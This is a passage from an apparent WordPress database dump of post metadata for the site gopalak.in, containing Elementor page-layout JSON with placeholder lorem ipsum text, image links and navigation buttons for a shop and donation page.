"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ac03799\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aeb1a8b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ea0ea08\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"4632219\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c941f20\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"2c835db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"cfc2a03\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca58180\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"7cf8f66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d615689\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f6202dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2828c5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f59e578\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"80c0fd8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"08a3c6f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f4344af\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7ae04a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8c99e89\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9f691ad\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"849b2d2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"9f057df\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"92c8f6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f179456\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c4982a2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b9adcb0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4d6d933\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"13bc018\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c14036e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b273e28\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(7604,1364,'_elementor_page_assets','a:0:{}'),(7605,1365,'_edit_lock','1663672069:1'),(7606,1365,'_edit_last','1'),(7607,1365,'_elementor_edit_mode','builder'),(7608,1365,'_elementor_template_type','wp-page'),(7609,1365,'_elementor_version','3.7.6'),(7610,1365,'_wp_page_template','frontpage.php'),(7611,1365,'_elementor_data','[]'),(7612,1365,'_elementor_page_assets','a:0:{}'),(7613,1367,'_edit_lock','1663672827:1'),(7614,1367,'_edit_last','1'),(7615,1367,'_elementor_edit_mode','builder'),(7616,1367,'_elementor_template_type','wp-page'),(7617,1367,'_elementor_version','3.7.6'),(7618,1367,'_wp_page_template','default'),(7619,1367,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(7620,1367,'_elementor_data','[]'),(7621,1367,'_elementor_page_assets','a:0:{}'),(7624,1350,'_edit_last','1'),(7625,1370,'_elementor_edit_mode','builder'),(7626,1370,'_elementor_template_type','landing-page'),(7627,1370,'_wp_page_template','elementor_canvas'),(7628,1370,'_elementor_version','3.7.6'),(7629,1370,'_elementor_data','[{\"id\":\"cb7724c\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"13bd434\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"97e7cee\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d7d2718\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1196cc3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"66192c8\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5168614\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"4a07d27\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"327ecb6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"334a86c\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"b1f9c2b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"e5344ab\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c5968\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7e686a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9d60269\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":101,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ffd233\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"e2f1149\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4ecb129\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"3e71e0f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ac03799\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aeb1a8b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ea0ea08\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"4632219\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c941f20\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"2c835db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"cfc2a03\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca58180\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"7cf8f66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d615689\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f6202dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2828c5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f59e578\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"80c0fd8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"08a3c6f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f4344af\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7ae04a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8c99e89\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9f691ad\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"849b2d2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"9f057df\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"92c8f6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f179456\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c4982a2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b9adcb0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4d6d933\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"13bc018\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c14036e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b273e28\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(7630,1370,'_elementor_page_assets','a:0:{}'),(7634,1371,'_edit_lock','1663735307:1'),(7636,1371,'_elementor_template_type','wp-page'),(7637,1371,'_elementor_version','3.7.6'),(7638,1371,'_edit_last','1'),(7639,1371,'_wp_page_template','fp-landing-template.php'),(7640,1371,'_elementor_data','[]'),(7641,1371,'_elementor_page_assets','a:0:{}'),(7642,1371,'open_shop_disable_page_sidebar','on'),(7643,1371,'_elementor_edit_mode','builder'),(7644,1373,'_edit_lock','1667449719:1'),(7645,1373,'_edit_last','1'),(7646,1373,'_elementor_edit_mode','builder'),(7647,1373,'_elementor_template_type','wp-page'),(7648,1373,'_elementor_version','3.7.8'),(7649,1373,'_wp_page_template','elementor_canvas'),(7650,1373,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",